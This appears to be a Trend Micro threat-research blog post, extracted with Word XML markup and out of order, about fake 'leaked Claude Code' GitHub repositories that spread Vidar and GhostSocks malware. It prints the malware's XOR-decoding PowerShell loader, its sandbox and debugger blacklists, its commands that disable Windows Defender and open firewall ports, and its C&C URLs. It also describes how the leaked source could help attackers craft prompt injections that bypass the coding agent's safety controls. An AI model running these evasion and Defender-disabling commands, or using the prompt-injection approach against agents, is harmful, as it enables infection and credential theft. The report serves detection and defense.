/ RegQueryValueExW</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VMware Tools, VirtualBox Guest Additions paths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Process Enumeration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CreateToolhelp32Snapshot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vmtoolsd.exe, vmwaretray.exe, vboxservice.exe, vboxtray.exe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Driver Files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File existence checks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VBoxGuest.sys, vmhgfs.sys, vmmouse.sys, VBoxMouse.sys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MAC Prefixes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Network adapter enumeration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08:00:27 (VirtualBox), 00:15:5D (Hyper-V), 52:54:00 (QEMU)</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GPU Adapters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Display adapter name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vmware svga, "virtualbox graphics", "hyper-v video"</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BIOS Strings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System firmware checks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seabios, "bochs", "qemu", "hyper-v", "vmware", "vbox"</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Network IP</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IP address check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10.0.2.15 (VirtualBox default NAT)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3. Artifacts checked for VM detection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also checks the following virtual machine related artifacts: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VM BIOS/Motherboard Strings: seabios bochs qemu vrtual hyper-v vmware google vbox innotek virtual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VM Driver Files: vmmouse.sys vmhgfs.sys VBoxMouse.sys VBoxGuest.sys VBoxSF.sys VBoxVideo.sys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MAC Prefix Associated VM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8:00:27</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VirtualBox</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00:15:5D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Hyper-V</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52:54:00</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QEMU/KVM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00:23:45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VirtualBox (alternate)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4. VM MAC Prefixes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Sandbox evasion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Beyond VM detection, the malware implements extensive sandbox-specific evasion using comprehensive blacklists targeting known analysis environments, research usernames, and sandbox hostname patterns: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Blacklisted usernames: malware virus sandbox sand box wdagutilityaccount bruno sample, maltest currentuser jz dekker Janet Van Dyne Harry Johnson tim John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Blacklisted Hostnames: Wasp DESK-IVRUUH4Y14 MARS AMAZING-AVOCADO</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BIOS serials: Serial Associated environment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ete9t8e8t3</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Windows Defender Application Guard (WDAG)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H6MBDR4</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Trellix / FireEye sandboxes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0311-3550-2146-3025-5233-5781-38</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Analysis environment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Default/missing BIOS serial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1234567890</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Common VM placeholder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5. Serial numbers checked for VM detection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Datacenter CPU: Xeon EPYC</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Motherboard Manufacturer Blacklist: VirtualBox Google Compute Engine Virtual Machine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Sandbox DLLs: cuckoomon.dll SbieDll.dll SxIn.dll cmdvrt32.dll cmdvrt64.dll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Sandbox Hostname Patterns: Oeslmdig Bkismujm Cgpslqmr Dhrtnpns Ekuuoqot Flvvprpu Gmwwqsqv Hnxxrtrw Ioyysssx Jpzzttty Kqaauuuz Lrbbvvva Msccwwwb Ntddxxxc Oueeyyyd Pvffzzze Regex matching the pattern zds_fedr_ol_client_\d+$ Debugger and analysis tool detection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addition to environment checks, the malware enumerates running processes to identify debuggers and analysis tools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Blacklisted processes: ollydbg.exe x32dbg.exe x64dbg.exe windbg.exe ida.exe ida64.exe, processhacker.exe procexp.exe procexp64.exe wireshark.exe fiddler.exe, charles.exe sandboxie.exe vmtoolsd.exe vmwaretray.exe vmwareuser.exe, vboxservice.exe vboxtray.exe Payload storage and extraction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malware contains an embedded PowerShell payload that is XOR-encoded within the binary. The encoded data resides in the .data section and is decoded at runtime before execution. Additionally, the malware can download payloads from its C&amp;C infrastructure.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embedded payload uses a two-layer encoding scheme. First, the data is XOR-encoded with key 44. The result is then Base64-encoded for storage. At runtime, the malware reverses this process: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Embedded XOR-encoded PowerShell payload $uowuunxT = 'CFwdDBEMC28WcHlfSV5fCyYIXB4MEQwOCElCWhZ4aWF8...' $uMoRdtBr = [System.Convert]::FromBase64String($uowuunxT) $wsCDOjzN = 44 # XOR key $swGGrVXi = [byte[]]@() foreach ($b in $uMoRdtBr) { $swGGrVXi += $b -bxor $wsCDOjzN } $GCdKMnvk = [System.Text.Encoding]::UTF8.GetString($swGGrVXi) &amp; ([ScriptBlock]::Create($GCdKMnvk))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XOR decryption with key 44 (0x2C), the payload reveals significant Windows Defender evasion and firewall manipulation capabilities. The decrypted script systematically disables security controls to enable follow- on payloads to execute without interference.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payload adds exclusions for common malware drop locations as well as prevents the scanning of PowerShell processes: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Path exclusions added by the decrypted payload $paths = @( 'C:\Users', # User profile directories "$env:TEMP", # Temporary files directory 'C:\ProgramData', # Application data 'C:\OneDriveTemp', # OneDrive temporary storage 'C:\Users\Public', # Public user folder 'C:\Windows' # Windows system directory ) foreach ($item in $paths) { Add-MpPreference -ExclusionPath '$item' }</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Process exclusions - prevents scanning of PowerShell Add-MpPreference -ExclusionProcess 'powershell.exe' Add-MpPreference -ExclusionProcess 'pwsh.exe'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payload systematically disables multiple Defender protection features: Feature Command Impact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MAPS Reporting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-MAPSReporting 0</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Disables cloud-based telemetry to Microsoft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Block at First Seen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-DisableBlockAtFirstSeen $true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Disables cloud-based threat blocking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Sample Submission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-SubmitSamplesConsent NeverSend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Prevents automatic sample uploads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Cloud Block Level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-CloudBlockLevel 0</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Disables cloud protection level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PUA Protection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-PUAProtection disable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Disables potentially unwanted app detection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IOAV Protection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-DisableIOAVProtection $true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Disables scanning of downloaded files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Behavior Monitoring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-DisableBehaviorMonitoring $true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Disables real-time behavior analysis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6. Windows Defender security features disabled by the payload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payload also opens inbound TCP ports for C&amp;C communication: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Firewall rules created by the decrypted payload $ports = @(57001, 57002, 56001) foreach ($port in $ports) { New-NetFirewallRule -DisplayName "Port $port TCP" ` -Direction Inbound ` -LocalPort $port ` -Protocol TCP ` -Action Allow ` -Enabled True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GPU hardware scoring system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binary implements a sophisticated GPU scoring mechanism to prioritize targets. Each detected GPU type receives a "bonus" score where lower absolute values indicate higher priority as a download target. This scoring system reveals the malware specifically targets gaming PCs: likely for cryptocurrency mining, game credential theft, or leveraging gaming GPU resources.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>GPU category Detection strings Score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Virtual GPU</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virtualbox, parallels, vmware svga, virtualbox graphics, hyper-v video, microsoft basic display adapter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REJECTED (sandbox)</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Integrated Graphics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intel(r) uhd graphics, intel(r) iris, intel(r) hd graphics, amd radeon(tm) graphics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-60</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Professional Card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quadro, radeon pro, rtx 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-80</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AMD Gaming Card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radeon rx 5, radeon rx 6, radeon rx 7</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-90</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Modern AMD Gaming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Modern Radeon models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-120</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Gaming Card (NVIDIA)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geforce rtx 2, geforce rtx 3, geforce rtx 4, geforce gtx 10, geforce gtx 16</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Highest priority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Basic Display (local)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Fallback local display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Low priority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Basic Display (RDP)</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Remote desktop context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Deprioritized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7. GPU scoring mechanism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Network communication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malware implements resilient C&amp;C communication using the Rust request library with Tokio async runtime. If the primary server is unreachable, it automatically switches to a backup URL. Each URL receives three connection attempts with two-second delays between retries.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downloader randomly selects from five hardcoded User-Agent strings to evade network-based detection: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36</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Once C&amp;C communication is established, the binary collects and reports system information to the C&amp;C before payload delivery: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Field Collection method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Username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Environment variable harvesting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Public IP</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HTTP request to external IP service (encrypted URL at 0x140832BB0)</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Timestamp</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System time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App Version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Hardcoded 1.3.12</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GPU Model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Registry enumeration of display adapters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CPU Info</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Registry key HARDWARE\DESCRIPTION\System\CentralProcessor\0, value ProcessorNameString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Core Count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System processor information query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Drive Info</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Starting from C:\</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8. System information sent to the C&amp;C server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malware follows the following download and installation chain: Fetch driver list: HTTP GET to primary URL (pastebin[.]com/raw/mcwWi1Ue), falls back to backup (snippet[.]host/efguhk/raw) Parse URLs: Extracts driver download URLs from fetched content Download archive: Attempts download with up to 3 retries per URL (primary then backup), 2-second delay between retries Fetch password: Requests archive extraction password from C&amp;C server; falls back to hardcoded default if server returns empty or fails Extract payload: Unpacks the password-protected archive containing the "driver" payload Execute payload: Runs extracted content, likely a secondary malware stage or cryptominer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Security implications of the leaked source code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While the immediate threat is the social engineering campaign delivering Vidar, the leaked source code itself presents a distinct and longer-lasting risk surface. Security experts have warned that access to approximately 512,000 lines </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>of production code from a frontier AI company opens several attack vectors that extend well beyond using the leak as a lure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Vulnerability research and exploitation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full access to the codebase, both security researchers and threat actors can systematically audit the code for exploitable vulnerabilities. This concern materialized almost immediately. Within days of the leak, a critical vulnerability in Claude Code was publicly reported , demonstrating that the code is being actively analyzed.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agentic nature of Claude Code makes this particularly concerning. Unlike a traditional application, Claude Code interacts with file systems, executes terminal commands, reads and writes files, and manages development environments. A vulnerability in the agentic harness could allow: Arbitrary code execution through crafted inputs or project files Data exfiltration from developer environments via manipulated tool calls Privilege escalation through the tool permission system Prompt injection blueprint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leaked source also reveals exactly how Claude Code constructs its system prompts, parses user instructions, handles tool definitions, and enforces safety boundaries. This is effectively a blueprint for crafting targeted prompt injections, with attackers knowing the precise wording, ordering, and structure of the safety instructions that govern the model's behavior.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knowledge could be used to bypass safety controls by understanding their exact implementation, craft inputs that exploit parsing edge cases, and design adversarial inputs optimized for the specific prompt architecture. Anti-distillation and competitive intelligence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ANTI_DISTILLATION_CC mechanisms revealed in the source code demonstrate Anthropic's approach to preventing competitors from training on Claude's API outputs. With the implementation details now public, adversaries have a roadmap for circumventing these protections. The cryptographic signatures and fake tool definitions used as canary traps are now visible and can be stripped or avoided. Agentic attack surface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Perhaps the most significant long-term concern is the exposure of the complete "agentic harness," which is the system that enables Claude Code to interact with real computing environments. The source code reveals how the model decides which tools to invoke and in what sequence, the permission model governing file system access, command execution, and network operations, the sandbox boundaries and how they are enforced, and the internal safety classifiers and their decision logic.</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Access to this knowledge gives adversaries a significant advantage in designing attacks against organizations whose developers use Claude Code in their workflows.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MITRE ATT&amp;CK TTPs Tactic Technique ID Description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Resource Development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Stage Capabilities: Upload Malware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T1608.001</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Malware hosted on GitHub Releases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Resource Development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Establish Accounts: Social Media Accounts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T1585.003</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Disposable GitHub accounts for distribution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Initial Access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Phishing: Spearphishing Link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T1566.002</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Lure repositories with download links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Execution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User Execution: Malicious File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T1204.002</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Victim executes trojanized dropper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Defense Evasion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Obfuscated Files or Information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T1027</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Rust-compiled dropper binary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Defense Evasion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Virtualization/Sandbox Evasion: System Checks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T1497.001</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Debug environment and user input checks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Credential Access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Credentials from Password Stores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T1555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Vidar steals browser credentials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Collection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Data from Local System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T1005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Cryptocurrency wallets and session tokens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Command and Control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Web Service: Dead Drop Resolver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T1102.001</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Steam/Telegram profiles for C2 resolution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Command and Control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Proxy: Multi-hop Proxy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T1090.003</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GhostSocks SOCKS5 proxy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Exfiltration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Exfiltration Over C2 Channel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T1041</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Data sent to Vidar C2</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9. TTPs used in the campaign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Security recommendations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Organizations can reduce the risk from this campaign by tightening controls around tool installation, validating software sources, and actively monitoring for malicious activity using the following measures.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Instruct developers to use verified sources only. Legitimate Claude Code is available only through official channels at claude.ai/install.sh (macOS/Linux) or claude.ai/install.ps1 (Windows), and via Homebrew, WinGet, or the VS Code/JetBrains extensions. npm installation has been deprecated. Any GitHub repository offering a standalone download should be treated as malicious.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Treat GitHub Releases with scrutiny. The campaign abuses GitHub Releases as a trusted delivery mechanism. Large 7z archives (78-167 MB) hosted on newly created repositories with minimal commit history are a strong signal of abuse.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Block known infrastructure. Add the C&amp;C domains and IPs listed in the IOC section to network blocklists.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Monitor for infostealer indicators. Watch for credential dumping patterns, connections to Steam Community profiles and Telegram channels used as dead drop resolvers, and unusual SOCKS5 proxy activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Audit AI tool installations. Establish clear organizational policies for which AI coding tools are approved and how they should be installed. Maintain an allowlist of approved sources.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enforce endpoint detection. Ensure endpoints have detections for Vidar stealer variants and Rust-compiled droppers. The malware's anti-sandbox behavior means static detection rules are especially important. Conclusion: Governance is the control plane for agentic risk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Claude Code leak incident demonstrates that security compromise is not limited to software vulnerabilities; it is frequently enabled by weaknesses in people and organizational processes, which often drive the highest impact. In practice, threat actors did not need a zero-day in the leaked codebase: they leveraged attention, trust signals, and predictable user behavior to achieve execution and credential theft.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pattern becomes more consequential as organizations adopt agentic AI. Agentic systems can plan, reason, and act across enterprise environments, invoking tools, accessing data, and triggering workflows. Because these systems operate through iterative, adaptive loops rather than fully deterministic execution paths, the outcomes can be difficult to predict, trace, or control.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Accordingly, TrendAITM is designing solutions as an Agents Governance Gateway, positioning governance as the control plane, rather than treating the problem as security alone. The objective is to give organizations the ability to discover and inventory agents, observe what they are doing, understand behavior and intent across tool and data interactions, detect unsafe or anomalous actions, and enforce policy so that autonomous capability can be adopted with measurable control and accountability. Proactive security with TrendAI Vision OneTM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TrendAI Vision OneTM is the industry-leading AI cybersecurity platform that centralizes cyber risk exposure management, security operations, and robust layered protection.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Utilizing Observed Attack Techniques (OAT)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TrendAI Vision OneTM customers that use endpoint and server protection solutions may go into the Observed Attack Techniques section of the TrendAI Vision OneTM console to look for suspicious activity that may indicate the detection of malicious behavior associated with this threat.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Potential indicators include: Execution of Claude with Leaked Version Possible Claude Code Related File Download AWS Claude Leak UserAgent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 Vision One Workbench</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Patterns, Models, and Signatures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TrendAI Vision OneTM solutions that utilize different pattern, behavior monitoring and other advanced detection technology can also detect and protect against the following known malicious components associated with in the wild exploits: TrojanSpy.Win64.VIDAR.SMCLX (Smart Scan Agent Pattern 20.863) Trojan.Win64.VIDAR.CLX (Smart Scan Agent Pattern 20.863)</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TrendAI Vision OneTM Web Reputation Services (WRS)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TrendAI Vision OneTM is also blocking several known C&amp;C servers and Disease Vector IPs and domains known to be associated with these exploits. Aside from that, verified malicious GitHub repositories and leak code download leaks are blocked as Illegal or Prohibited Content. TrendAI Vision OneTM Threat Intelligence Hub</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TrendAI Vision OneTM Threat Intelligence Hub provides the latest insights on emerging threats and threat actors, exclusive strategic reports from TrendAITM Research, and TrendAI Vision OneTM Threat Intelligence Feed in the TrendAI Vision OneTM platform.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Emerging Threats: Claude Code Leak Social Engineering and Malware Distribution via GitHub</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 Threat Intelligence Hub</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TrendAI Vision OneTM Intelligence Reports (IOC Sweeping)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Claude Code Leak Social Engineering and Malware Distribution via GitHub Hunting Queries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TrendAI Vision OneTM Search App</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TrendAI Vision OneTM customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.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Detects VIDAR and GHOSTSOCKS malware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malName: *VIDAR* OR *GHOSTSOCKS* and eventName: MALWARE_DETECTION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Detects VIDAR connection to C&amp;C server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eventSubId:204 AND dst:("rti.cargomanbd.com")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hunting queries are available for TrendAI Vision OneTM with Threat Intelligence Hub entitlement enabled.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Indicators of Compromise (IOCs)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IOCs related to this campaign can be found here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2026.04.03 23:56</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Weaponizing Trust Signals: Claude Code Lures and GitHub Release Payloads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packaging error in Anthropic's Claude Code npm release briefly exposed internal source code. This entry examines how threat actors rapidly weaponized the resulting attention, pivoting an existing AI-themed campaign to spread Vidar and GhostSocks.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Jacob Santos, Sophia Nilette Robles Apr 03, 2026</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Key takeaways Anthropic inadvertently exposed internal Claude Code source material via a misconfigured npm package, which included approximately 512,000 lines of internal TypeScript and triggering rapid mirroring across GitHub.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Within 48 hours, threat actors took advantage of the attention around the leak, to distribute Vidar stealer and GhostSocks proxy malware through fake "leaked Claude Code" GitHub repositories.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The Claude Code bait is part of a broader rotating lure operation active since February 2026, impersonating more than 25 software brands while delivering the same Rust-compiled infostealer payload.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The campaign abuses GitHub Releases as a trusted malware delivery channel, using large trojanized archives and disposable accounts to repeatedly evade takedowns.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Beyond serving as a lure, the leaked source code itself introduces longer- term risks including vulnerability discovery, prompt injection blueprinting, and agentic attack surface exposure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Organizations should only approve designated installation paths for AI developer tools and should actively detect and block malicious indicators. Organizations should also consider applying governance as a control plane for agentic risk. This incident signifies that security compromise doesn't always come from software vulnerabilities: it can also come from human and organizational gaps. That's why TrendAITM is introducing Agentic Governance Gateway to empower organizations to discover, observe, understand, detect, and enforce governance over agentic AI behaviors to ensure safe and reliable adoption of autonomous AI.</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late March 2026, Anthropic inadvertently released the internal Claude Code source material as part of an npm package that included a large internal source map file. Although the incident stemmed from a simple packaging mistake, threat actors were quick to capitalize on the resulting attention. Only 48 hours after the leak, they were able to create fake GitHub repositories to distribute credential-stealing malware disguised as "leaked" Claude Code downloads.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incident demonstrates that security compromise is not limited to software vulnerabilities: human factors and organizational control gaps often serve as catalyst for threats and are primary drivers of material impact. In this blog entry, we will talk about our analysis of the threats capitalizing on this incident, the downstream risks of the leaked source code, and the actions organizations should take next. The Claude Code source leak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 March 31, 2026, a routine npm publish for Anthropic's @anthropic- ai/claude-code package (version 2.1.88) inadvertently included a file that should never have shipped: cli.js.map, a 59.8 MB JavaScript source map generated by the Bun bundler. This file's embedded sourcesContent field exposed the complete original TypeScript source tree- approximately 512,000 lines of code across 1,900 files-corresponding to build artifacts hosted on a publicly accessible Cloudflare R2 storage bucket.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The exposure was not a sophisticated breach, but a packaging error. The project's .npmignore file failed to exclude .map files from the distribution. Because Bun generates full source maps by default, without an explicit exclusion rule, the entire agentic harness powering Claude Code was also shipped out and laid bare to anyone who ran npm install.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Within hours, the leaked source was mirrored across thousands of GitHub repositories. Anthropic confirmed the incident stemmed from human error, pulled the affected package version, and issued DMCA takedown notices against the mirrors. The company assured that no customer data or credentials were exposed.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marked the second major Anthropic source-exposure incident in two months, following the "Mythos" leak, which also happened late-March and revealed internal details about an unreleased powerful AI model intended for cybersecurity use cases. Attack timeline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Before this leak, threat actors have been running AI-themed malware lures since at least February 2026, cycling through fake tools and repositories to attract developer interest. The Claude Code source leak on March 31 provided a convenient lure, a high-profile and timely lure. This enabled operators to rapidly repurpose their already existing infrastructure. By April, within 48 hours of the leak, they pivoted to impersonating "leaked" Claude Code downloads, using the incident's visibility to accelerate distribution of their infostealer payloads.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Date Incident Description Key details February 26 AI tool lures Malware campaign using fake AI tools TradeAI.exe 18+ unique samples Copilot, Cursor, AI tools Active campaign March 31, 2026 Source code leak Accidental exposure of source code Anthropic npm packaging error 59.8 MB source map exposed 512K lines TypeScript March 31 to April Time window Delay between leak and weaponization Within 48 hours of the leak April Claude Code lure Malware distribution under fake Claude tooling ClaudeCode_x64.7z ClaudeCode_x64.exe Vidar v18.7 + GhostSocks GitHub Releases delivery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 The campaign timeline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the source code revealed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leaked codebase exposed several unreleased features and internal mechanisms: KAIROS: An autonomous daemon mode referenced over 150 times in the codebase, enabling Claude Code to run as a persistent background agent that operates proactively without user initiation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Undercover Mode: A module (undercover.ts) that instructs the model to strip all mentions of Anthropic internals and the "Claude Code" name when contributing to external repositories.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Dream System: A background memory-consolidation process (autoDream) that runs during idle periods to reorganize and optimize project-specific memories.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Anti-Distillation: Protective mechanisms (ANTI_DISTILLATION_CC) that inject fake tool definitions and apply cryptographic signatures to prevent competitors from training on API traffic.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Model codenames: References to upcoming models, including Capybara (Claude 4.6), Fennec (Opus 4.6), and Numbat.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Buddy Pet: A hidden Tamagotchi-style AI pet feature with RPG-like stats that respondss to user coding activity.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Claude Code: One lure in a larger campaign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Threat actors did not need the source code itself. They needed the hype.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Within 48 hours of the leak making headlines, malicious GitHub repositories began appearing in search results-and near the top of Google results-for queries like "leaked Claude Code source" and "Claude Code download." These repositories relied on familiar social engineering tactics, including READMEs promising "leaked source code" and "unlocked enterprise features," fake download buttons embedded as images, and GitHub Releases hosting trojanized 7z archives.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Claude Code bait, however, was only the latest chapter in a much broader operation. Similar GitHub-hosted lure campaigns earlier this year abused fake AI tooling repositories to distribute Vidar-class infostealers and GhostSocks proxy malware, as previously documented by Huntress. Our observation reveals that it's likely that the same threat actors have been running a rotating-lure campaign since dating back to February 2026, cycling through more than 25 distinct software brands to attract victims. Regardless of the name on the label or the branding, every archive delivers the same thing: a Rust-compiled dropper, TradeAI.exe, which deploys Vidar stealer alongside the GhostSocks proxy malware. A rotating carousel of lures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operation's scale becomes apparent when examining the parent archives that contain the TradeAI.exe payload. Across 22 unique payload variants, we identified 38 distinct 7z archives-each branded as a different piece of popular software.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lure themes fall into several categories that reveal the operators' targeting strategy: AI and LLM tools make up the largest cluster, capitalizing on the surge of interest in generative AI. The campaign impersonates well-known names like Claude Code itself (packaged as ClaudeCode_x64.7z and claude-cowork-win- x64.7z), references to specific model versions (opus-4-6-x64.7z), and GitHub Copilot (CopilotCowork_x64.7z). It also mimics lesser-known or fictional AI brands, namely KawaiiGPT_x64.7z, WormGPT_x64.7z, NemoClaw_x64.7z (styled as an NVIDIA product), SimpleClaw_x64.7z, clawdbot_x64.7z, nanobot_x64.7z, and OpenClaw_x64.7z. The naming is deliberate to entice victims, wherein some sound like legitimate open- source projects, while others like "WormGPT" exploit curiosity around underground AI tools.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Cryptocurrency and trading tools form the second major theme. Archives named hyperliquid-bot_x64.7z and bbg_free_x64.7z (mimicking Bloomberg Terminal) target the finance and crypto community, which is a demographic </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>with high-value credentials and wallet data that makes them attractive target for infostealer campaigns.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Creative and media tools round out the lure portfolio. The operators impersonate voice modification software (voicemod_x64.7z), AI video generation tools (seedance_x64.7z, LTX-2.3_x64.7z, SoraRemover_x64.7z), and image generation tools (Z_image_x64.7z). These lures target content creators and artists who may be less security-conscious about software sourced from GitHub.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
